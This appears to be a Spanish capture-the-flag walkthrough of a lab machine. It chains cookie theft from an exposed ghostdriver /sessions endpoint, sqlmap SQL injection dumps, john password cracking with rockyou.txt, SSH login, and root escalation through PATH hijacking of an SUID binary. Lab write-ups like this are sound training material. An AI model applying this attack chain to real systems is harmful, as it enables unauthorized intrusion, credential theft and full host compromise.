Vemos que tiene el directorio /_admin, al cual si entramos
en http://192.168.1.52/_admin/dist nos lleva a una pantalla
de login....
Por otro lado, buscamos mas informacion en el puerto 443.
Vemos que hay un directorio llamado /sessions.
Si entramos, podemos ver que es algo relacionado con phantomjs
y ghostdriver....
Buscando mas informacion encontramos los comandos integrados en
ghostdriver:
https://docs.google.com/spreadsheets/d/17PKHWWhOgEFB8Vznju_bB6p9duguo-2NqL9qBgUQ
iYE/edit#gid=0
Exploitation
Despues de ver los comandos accedemos a:
http://192.168.1.52:443/sessions
Podemos ver la sesion-id, la copiamos y vamos a:
http://192.168.1.52:443/session/022189e0-95f5-11ea-b7bf-5d93144ae786/cookie
Copiamos el "value".
Vamos a http://192.168.1.52/_admin/dist/ y con el cookie manager
ponemos el "value" que hemos copiado anteriormente, de ese
modo al recargar la pagina ya estamos logueados...
Vamos a "Database Admin -> Execute" y capturamos la request
con Burp Suite.
La guardamos como un fichero (hackme.txt).
Ejecutamos sqlmap y vemos que el comando command es vulnerable.
Miramos las BBDD que hay.
sml@Cassandra:~$ sqlmap -r h --dbs
[18:20:06] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:20:06] [INFO] fetching database names
[18:20:06] [INFO] fetching number of databases
[18:20:06] [INFO] resumed: 2
[18:20:06] [INFO] resumed: information_schema
[18:20:06] [INFO] resumed: orders
available databases [2]:
[*] information_schema
[*] orders
Miramos las tablas.
sml@Cassandra:~$ sqlmap -r hackme.txt --dbs -D orders --tables
[18:20:10] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:20:10] [INFO] fetching database names
[18:20:10] [INFO] fetching number of databases
[18:20:10] [INFO] resumed: 2
[18:20:10] [INFO] resumed: information_schema
[18:20:10] [INFO] resumed: orders
available databases [2]:
[*] information_schema
[*] orders
[18:20:10] [INFO] fetching tables for database: 'orders'
[18:20:10] [INFO] fetching number of tables for database 'orders'
[18:20:10] [INFO] resumed: 2
[18:20:10] [INFO] resumed: orders
[18:20:10] [INFO] resumed: users
Database: orders
[2 tables]
+--------+
| orders |
| users |
+--------+
Copiamos el password del usuario m0n3y6r4bb3r a un fichero
y lo crackeamos usando john y el diccionario rockyou.txt.
sml@Cassandra:~$ nano tocrack.txt
sml@Cassandra:~$ sudo /usr/sbin/john tocrack.txt
--wordlist=/home/sml/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
delta1 (?)
1g 0:00:07:12 DONE (2020-05-17 19:07) 0.002313g/s 44.64p/s 44.64c/s 44.64C/s
greta..blakey
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Obtenemos la password.
Nos logueamos con moneygrabber, es decir m0n3y6r4bb3r pero
sustituyendo los numeros por letras.
Low Shell
sml@Cassandra:~$ ssh moneygrabber@192.168.1.52
MONEY MAKER.
PLEASE LOGIN.
moneygrabber@192.168.1.52's password:
Last login: Thu May 14 21:43:28 2020 from 192.168.1.148
[moneygrabber@ppeshop ~]$
Exploramos el sistema y miramos si hay algo interesante.
Vemos que esta el fichero /usr/bin/backup con SUID.
Al ejecutarlo, ejecuta tar/mysql.tar, asi que creamos
un enlace simbolico de bash con los nombres tar
y mysql.tar, exportamos el PATH para que apunte a nuestros
enlaces y ejecutamos :)